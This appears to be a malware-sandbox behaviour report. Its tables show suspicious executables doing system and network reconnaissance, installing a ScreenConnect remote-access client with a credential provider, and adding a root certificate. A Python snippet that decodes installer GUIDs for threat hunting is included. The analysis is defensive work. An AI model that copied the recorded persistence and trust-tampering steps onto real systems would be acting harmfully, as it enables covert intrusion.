| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = … | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\PackageCode = "84F03508698966EF2ABADC1907673931" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1045960512-3948844814-3059691613-1000\{020CC76E-28AB-4434-8B9F-D648DCEE2007} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductName = "ScreenConnect Client (c13606fe9009f11d)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Version = "402784261" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\ = "ScreenConnect Client (c13606fe9009f11d) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductIcon = "C:\\Windows\\Installer\\{80530F48-9896-FE66-A2AB-CD9170769313}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
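The Installer\Products, Installer\Features and Installer\UpgradeCodes keys written by msiexec.exe above name the package by a "squished" (Darwin) GUID, and the Version value is a packed DWORD. Decoding them turns these rows into something searchable: the product code that appears in plain form in the ProductIcon path (L-style reference: `{80530F48-9896-FE66-A2AB-CD9170769313}`) and the ScreenConnect client version. The following Python is an added example written for this page, not sandbox output; the function names are the author's own, and the only facts it relies on are the squish transform (reverse the first three groups, swap byte pairs in the last two) and the MSI version packing (major in the top byte, minor in the next, build in the low word).

```python
"""Decode Windows Installer registry identifiers from the table above (added example)."""
import re


def _swap_pairs(chunk: str) -> str:
    """Swap each adjacent pair of characters: 'A2AB' -> '2ABA'."""
    return "".join(chunk[i + 1] + chunk[i] for i in range(0, len(chunk), 2))


def unsquish_guid(squished: str) -> str:
    """Turn a 32-hex-character squished GUID into {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}."""
    s = squished.strip().upper()
    if not re.fullmatch(r"[0-9A-F]{32}", s):
        raise ValueError(f"expected 32 hex characters, got {squished!r}")
    parts = [s[0:8][::-1], s[8:12][::-1], s[12:16][::-1],
             _swap_pairs(s[16:20]), _swap_pairs(s[20:32])]
    return "{" + "-".join(parts) + "}"


def squish_guid(guid: str) -> str:
    """Inverse of unsquish_guid: {...} product code -> registry key name."""
    g = guid.strip().strip("{}").upper()
    if not re.fullmatch(r"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", g):
        raise ValueError(f"not a GUID: {guid!r}")
    p = g.split("-")
    return p[0][::-1] + p[1][::-1] + p[2][::-1] + _swap_pairs(p[3]) + _swap_pairs(p[4])


def decode_msi_version(value: int) -> str:
    """Installer 'Version' DWORD: major<<24 | minor<<16 | build."""
    return f"{(value >> 24) & 0xFF}.{(value >> 16) & 0xFF}.{value & 0xFFFF}"


def guid_tail16(guid: str) -> str:
    """Last 16 hex characters of a GUID (clock-seq + node), lower-cased for comparison."""
    return guid.strip("{}").replace("-", "")[-16:].lower()


# One 'Indicator' cell from the Installer rows above; the optional second code is the
# product listed under an UpgradeCodes entry.
INSTALLER_CODE_RE = re.compile(
    r"\\Installer\\(Products|Features|UpgradeCodes)\\([0-9A-F]{32})(?:\\([0-9A-F]{32}))?", re.I)
VERSION_RE = re.compile(r'\\Version = "(\d+)"')


def describe_installer_indicator(indicator: str) -> dict:
    """Decode the codes (and Version, if present) carried by one registry indicator string."""
    m = INSTALLER_CODE_RE.search(indicator)
    if not m:
        return {}
    info = {"table": m.group(1), "code": unsquish_guid(m.group(2))}
    if m.group(3):
        info["related_code"] = unsquish_guid(m.group(3))
    v = VERSION_RE.search(indicator)
    if v:
        info["version"] = decode_msi_version(int(v.group(1)))
    return info


if __name__ == "__main__":
    for row in [
        r'\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Version = "402784261"',
        r'\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1\84F03508698966EF2ABADC1907673931',
    ]:
        print(describe_installer_indicator(row))
```

Run against the two rows in the `__main__` block, the product key decodes to `{80530F48-9896-FE66-A2AB-CD9170769313}` (the same GUID msiexec wrote into the ProductIcon path) with Version 24.2.5, and the upgrade code decodes to `{F2AB71B9-B640-FC52-C136-06FE9009F11D}`; its trailing 16 hex characters are `c13606fe9009f11d`, the instance id embedded in the product name "ScreenConnect Client (c13606fe9009f11d)" on this page, which gives a second pivot for hunting the same client build in other hives.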
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe | N/A |
